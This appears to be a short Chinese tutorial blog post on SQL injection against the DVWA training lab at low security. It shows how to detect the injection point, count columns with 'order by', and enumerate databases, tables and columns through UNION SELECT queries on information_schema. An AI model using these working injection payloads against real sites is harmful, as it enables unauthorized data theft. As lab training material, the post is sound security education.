天天看點

【fairy】DVWA sql注入——等級:low

【fairy】DVWA sql注入——等級:low

提示輸入User ID,将顯示ID,First name, Surname.這裡輸入ID為1,

【fairy】DVWA sql注入——等級:low

可以得出此處為注入點,嘗試輸入1‘ 傳回錯誤。

【fairy】DVWA sql注入——等級:low
【fairy】DVWA sql注入——等級:low

利用order by num語句猜測查詢資訊清單,修改num的值,輸入1’ order by 1#頁面正常顯示。繼續測試,1’ order by 2#、1’ order by 3#

【fairy】DVWA sql注入——等級:low
【fairy】DVWA sql注入——等級:low

Num值為2時顯示正常,3時報錯,由此可以推斷有兩列。 

輸入 1' union select 1,schema_name from information_schema.schemata#查詢mysql資料庫,所有資料庫名字:這裡利用mysql預設的資料庫information_scehma,該資料庫存儲了Mysql所有資料庫和表的資訊

【fairy】DVWA sql注入——等級:low

爆表名:1' union select 1,table_name from information_schema.tables where table_schema='dvwa'  and table_type='base table' #

【fairy】DVWA sql注入——等級:low

爆字段: 1' union select 1,column_name from information_schema.columns where table_name='users' #

【fairy】DVWA sql注入——等級:low

​​​​​​​